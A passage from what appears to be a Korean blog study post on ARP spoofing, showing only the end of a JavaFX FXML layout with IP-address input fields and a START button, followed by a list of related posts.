		<TextArea fx:id="textArea" editable="false" layoutX="15" layoutY="156" 
			prefHeight="325" prefWidth="462"></TextArea>
		<Label layoutX="486" layoutY="14" text="My IP">
			<font>
				<Font size="15"/>
			</font>
		</Label>
		<Label layoutX="486" layoutY="44" text="Sender IP">
			<font>
				<Font size="15"/>
			</font>
		</Label>
		<Label layoutX="486" layoutY="75" text="Target IP">
			<font>
				<Font size="15"/>
			</font>
		</Label>
		<TextField fx:id="myIP" layoutX="562" layoutY="12" prefHeight="23" prefWidth="175"/>
		<TextField fx:id="senderIP" layoutX="562" layoutY="44" prefHeight="23" prefWidth="175"/>
		<TextField fx:id="targetIP" layoutX="562" layoutY="76" prefHeight="23" prefWidth="175"/>
		<Button fx:id="getMACButton" onAction="#getMACAction" layoutX="654" layoutY="112" 
			prefHeight="29" prefWidth="82" text="START"></Button>			
	</children>
</AnchorPane>

'Hacking > ARP 스푸핑' 카테고리의 다른 글

공부(16)  (0) 2021.09.13
공부(15)  (0) 2021.09.12
공부(13)  (0) 2021.09.12
공부(12)  (0) 2021.09.11
공부(11)  (0) 2021.09.11

+ Recent posts

티스토리툴바